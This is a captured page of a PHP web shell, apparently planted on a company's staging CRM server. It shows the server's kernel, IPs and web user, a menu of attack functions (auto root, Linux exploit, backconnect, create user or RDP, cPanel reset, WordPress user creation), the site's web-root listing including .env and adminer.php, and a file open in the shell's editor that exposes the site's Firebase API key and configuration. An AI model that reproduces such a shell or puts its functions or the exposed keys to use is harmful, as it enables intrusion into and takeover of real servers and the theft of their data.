Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.114.233
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
stagingcrm.oxopackaging.com /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
vendors
[ DIR ]
drwxr-xr-x
.env
979
B
-rw-r--r--
.htaccess
1.93
KB
-rw-r--r--
adminer.php
492.73
KB
-rwxr-xr-x
favicon.ico
0
B
-rw-r--r--
firebase-messaging-sw.js
1.35
KB
-rw-r--r--
index.php
1.73
KB
-rw-r--r--
mix-manifest.json
25.92
KB
-rw-r--r--
robots.txt
24
B
-rw-r--r--
web.config
1.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : firebase-messaging-sw.js
/* Give the service worker access to Firebase Messaging. Note that you can only use Firebase Messaging here, other Firebase libraries are not available in the service worker. */ importScripts('https://www.gstatic.com/firebasejs/7.23.0/firebase-app.js'); importScripts('https://www.gstatic.com/firebasejs/7.23.0/firebase-messaging.js'); /* Initialize the Firebase app in the service worker by passing in the messagingSenderId. * New configuration for app@pulseservice.com */ firebase.initializeApp({ apiKey: "AIzaSyDhEXays--nAkZkvgLVOuYKg7aml0X7jBU", authDomain: "oxo-crm.firebaseapp.com", projectId: "oxo-crm", storageBucket: "oxo-crm.appspot.com", messagingSenderId: "462346715103", appId: "1:462346715103:web:4426553e77450e4902ce6a", measurementId: "G-B44NEXTDF6" }); /* Retrieve an instance of Firebase Messaging so that it can handle background messages. */ const messaging = firebase.messaging(); messaging.setBackgroundMessageHandler(function(payload) { console.log('Received background message ', payload); /* Customize notification here */ const notificationTitle = "Background Message Title"; const notificationOptions = { body: "Background Message body.", icon: "/itwonders-web-logo.png", }; return self.registration.showNotification( notificationTitle, notificationOptions, ); });
Close